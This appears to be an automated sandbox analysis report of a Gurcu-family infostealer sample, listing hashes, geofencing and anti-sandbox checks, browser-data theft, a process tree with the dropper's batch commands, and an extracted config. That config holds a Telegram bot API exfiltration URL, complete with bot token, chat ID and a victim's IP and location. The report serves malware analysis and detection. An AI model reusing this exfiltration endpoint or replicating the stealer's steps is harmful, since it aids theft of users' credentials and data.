Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-12-2024 13:02
Static task
static1
Behavioral task
behavioral1
Sample
55f8e0ef95c316591d64a7bf1bf6ce7b.exe
Resource
win7-20240729-en
General
-
Target
55f8e0ef95c316591d64a7bf1bf6ce7b.exe
-
Size
5.6MB
-
MD5
55f8e0ef95c316591d64a7bf1bf6ce7b
-
SHA1
53a4f3375799babd0fcc08190a925b467e7fede7
-
SHA256
9d543df8d1d705870da23de3f9a43f467fe998836fd00d7ffff1ea3c4701e5f9
-
SHA512
f9bec2a6ee0ca7050c735d62b6be35d732269085a4f92c5720495ec6171ed40d887276f69da978487f08c48690e66f360fffc66a9d8e7cbb4fed04ebd0666ee0
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc/:adOuK6mn9NzgMoYkSIvUcwti7TQlvci6
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7822020748:AAGrioLZvBM_jgQaep0KKTha1_5Kzmwl62s/sendDocument?chat_id=7538374929&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 55f8e0ef95c316591d64a7bf1bf6ce7b.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation tempdatalogger.exe -
Executes dropped EXE 1 IoCs
pid Process 3184 tempdatalogger.exe -
Loads dropped DLL 2 IoCs
pid Process 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 3184 tempdatalogger.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 3 raw.githubusercontent.com 5 raw.githubusercontent.com 16 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3348 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 tempdatalogger.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier tempdatalogger.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1488 timeout.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe 3184 tempdatalogger.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe Token: SeDebugPrivilege 3348 tasklist.exe Token: SeDebugPrivilege 3184 tempdatalogger.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4564 wrote to memory of 212 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 83 PID 4564 wrote to memory of 212 4564 55f8e0ef95c316591d64a7bf1bf6ce7b.exe 83 PID 212 wrote to memory of 5112 212 cmd.exe 85 PID 212 wrote to memory of 5112 212 cmd.exe 85 PID 212 wrote to memory of 3348 212 cmd.exe 86 PID 212 wrote to memory of 3348 212 cmd.exe 86 PID 212 wrote to memory of 2676 212 cmd.exe 87 PID 212 wrote to memory of 2676 212 cmd.exe 87 PID 212 wrote to memory of 1488 212 cmd.exe 89 PID 212 wrote to memory of 1488 212 cmd.exe 89 PID 212 wrote to memory of 3184 212 cmd.exe 90 PID 212 wrote to memory of 3184 212 cmd.exe 90 PID 3184 wrote to memory of 1040 3184 tempdatalogger.exe 98 PID 3184 wrote to memory of 1040 3184 tempdatalogger.exe 98 PID 1040 wrote to memory of 4028 1040 cmd.exe 100 PID 1040 wrote to memory of 4028 1040 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\55f8e0ef95c316591d64a7bf1bf6ce7b.exe"C:\Users\Admin\AppData\Local\Temp\55f8e0ef95c316591d64a7bf1bf6ce7b.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp93B4.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp93B4.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:5112
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4564"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:2676
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:1488
-
-
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAEDD.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAEDD.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4028
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
322B
MD5878ea397b264a77de4109e50a5b00ddb
SHA12f735d813368d11200d6ba644bd92e99aac9ef73
SHA25676ac10695144e6365be96a4424b4e0aa36226265f71e73bcd3f43dbb1248bf89
SHA5121e00868ef13f3572cfa50f95a0be63a6a377eb8e1446b638a7aaee3efd096e241f767174be987f915c4c58d3cfa775bae4a18bf460ea68bb630123866a5ca1bb
-
Filesize
149B
MD59b50431381f90bb6149dbb5c85095c94
SHA13eed9d5a930e860d2308abec184946022a258a08
SHA256bc8d12c414c230d3c3d1e444a4a6af0bbe189ba0e810fd5aa3fd2873c5d32d4b
SHA512a581e798ff3db6780740d71e184b98acd42f11a7c7fcbf1416a3b24833a7b09a51487ef382eea5987d5bb3d4fc14cd12be0fef6ba388083b8818256cdfc30480
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
5.6MB
MD555f8e0ef95c316591d64a7bf1bf6ce7b
SHA153a4f3375799babd0fcc08190a925b467e7fede7
SHA2569d543df8d1d705870da23de3f9a43f467fe998836fd00d7ffff1ea3c4701e5f9
SHA512f9bec2a6ee0ca7050c735d62b6be35d732269085a4f92c5720495ec6171ed40d887276f69da978487f08c48690e66f360fffc66a9d8e7cbb4fed04ebd0666ee0